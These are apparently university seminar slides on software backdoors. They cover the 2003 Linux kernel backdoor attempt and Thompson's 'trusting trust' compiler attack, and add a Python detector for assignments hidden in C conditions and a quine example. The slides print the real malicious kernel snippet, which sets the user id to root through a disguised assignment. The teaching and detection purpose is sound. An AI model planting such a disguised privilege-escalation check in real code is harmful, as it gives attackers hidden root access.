BACKDOORS in Software
January 2008
Eino Malinen
Seminar on Software Engineering @ University of Turku
Definition and Introduction
• an unwanted software mechanism introduced into part of a system to provide easy access
• the attacker has created the mechanism earlier and wants to use it sometime later
• the mechanism can be injected
  • from outside: malware sent through the network
  • on-site: hard-coded into the software
• two examples of actual backdoors follow
Backdoor Attempt in Linux Kernel
• happened in November 2003
• a change in a kernel source file, kernel/exit.c
• the person who first noticed it focused on the annoyance that the file had been modified manually
• peers then queried more about the change itself
Backdoor Attempt in Linux Kernel
• the following piece of code was added:

    if ((options == (__WCLONE|__WALL)) &&
        (current->uid = 0))
            retval = -EINVAL;

• effectively this means that a caller passing the flags __WCLONE and __WALL together gets root permissions: the second operand is an assignment, so the current user id is set to 0 (root) as a side effect
• a lax review might take the latter as an evaluation of a condition instead of an assignment
• the extra parentheses avoid compiler warnings
Backdoor Attempt in Linux Kernel
• the attempt came to light because the file in question was under automatic modification tracking
• fellow developers were active enough to ask about the changes
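As an added illustration (not part of the original slides), here is a small Python check a reviewer could run over a C diff: it extracts every `if (...)` condition and flags any bare `=` assignment inside it, including one wrapped in extra parentheses, which is exactly the case a compiler warning lets through. The sample input is constructed: the snippet quoted on the slide plus two ordinary conditions for contrast.

```python
import re

# Constructed sample input: the kernel/exit.c change quoted on the slides,
# followed by a legitimate comparison and a legitimate (but still worth
# eyeballing) assignment-in-condition idiom.
SAMPLE = """\
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
if (current->uid == 0)
        retval = 0;
if ((p = find_task()) != NULL)
        retval = 1;
"""

# A single '=' that is not part of ==, !=, <=, >= or a compound assignment.
ASSIGN_RE = re.compile(r'(?<![=!<>+\-*/%&|^])=(?!=)')


def _extract_conditions(src):
    """Yield (line_no, condition_text) for every `if (...)` in C source."""
    for m in re.finditer(r'\bif\s*\(', src):
        depth = 0
        i = m.end() - 1          # index of the opening parenthesis
        start = i + 1
        while i < len(src):      # walk to the matching closing parenthesis
            if src[i] == '(':
                depth += 1
            elif src[i] == ')':
                depth -= 1
                if depth == 0:
                    break
            i += 1
        line_no = src.count('\n', 0, m.start()) + 1
        yield line_no, src[start:i]


def find_assignments_in_conditions(src):
    """Return [(line_no, condition)] for every if-condition containing an assignment.

    Every hit is reported, whether or not it is parenthesised, so the human
    reviewer decides which ones are idioms and which one is a backdoor.
    """
    hits = []
    for line_no, cond in _extract_conditions(src):
        if ASSIGN_RE.search(cond):
            hits.append((line_no, cond.strip()))
    return hits


if __name__ == "__main__":
    for line_no, cond in find_assignments_in_conditions(SAMPLE):
        print(f"line {line_no}: assignment inside condition: {cond}")
```

Run on the sample it reports line 1 (the `current->uid = 0` backdoor) and line 5 (the `(p = find_task()) != NULL` idiom); line 3 is clean. The point of reporting both is that the check is cheap enough to run on every incoming change and leaves the judgement to a reviewer, which is what caught the real attempt.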
Backdoors in Compilers
• introduced by Ken Thompson in 1984
• prerequisite concepts for a compiler backdoor
  • self-replicating program
    • a program that outputs its own source code
    • also known as a quine
  • training programs
    • adding a new feature to a program
    • e.g. teaching the compiler to recognize a new escaped symbol
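To make the self-replicating prerequisite concrete, here is an added Python example (not from the original slides): a two-line quine held as a string, plus a checker that executes a program text and compares what it prints with that same text. The quine program and the checker are constructed for this page.

```python
import contextlib
import io

# Template of the quine: %r re-inserts the template's own repr, and %% becomes
# a single % once the template is formatted with itself.
QUINE_TEMPLATE = 's = %r\nprint(s %% s, end="")\n'

# The actual two-line quine program, produced by formatting the template
# with itself; running it prints exactly this text.
QUINE_PROGRAM = QUINE_TEMPLATE % QUINE_TEMPLATE


def run_program(src: str) -> str:
    """Execute a Python program given as a string and return its stdout."""
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        exec(src, {})
    return buf.getvalue()


def is_quine(src: str) -> bool:
    """True if running src prints src itself, byte for byte."""
    return run_program(src) == src


if __name__ == "__main__":
    print(QUINE_PROGRAM, end="")
    print("is quine:", is_quine(QUINE_PROGRAM))
```

The trick that matters for the compiler story is in the template: the program carries its own text as data (`s`) and re-emits it through `%r`, so no file is ever read. A compiler that contains its own source as data in the same way can reproduce itself into whatever it compiles, which is the property the next phases rely on.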
Backdoors in Compilers
• phases of injecting a backdoor into a compiler
  • add a backdoor to the compiler source code
    • to compile a backdoor into the login command
  • add another backdoor to the compiler source code
    • to insert both backdoors, as self-replicating code, whenever the compiler source code itself is being compiled
Backdoors in Compilers
• the backdoor was tested on a friendly victim
• the disassembler was also rigged to fail when disassembling the object code
Sources
• Jeremy. Linux: Kernel "Back Door" Attempt. http://kerneltrap.org/node/view/1584
• Poulsen. Thwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388
• Thompson. Reflections on Trusting Trust. Communications of the ACM, Vol. 27, Issue 8 (Aug. 1984), pp. 761-763
• Skoudis & Zeltser. Malware: Fighting Malicious Code.
• Schneier. Countering "Trusting Trust". http://www.schneier.com/blog/archives/2006/01/countering_trus.html
• Zhang & Paxson. Detecting Backdoors. http://www.icir.org/vern/papers/backdoor/index.html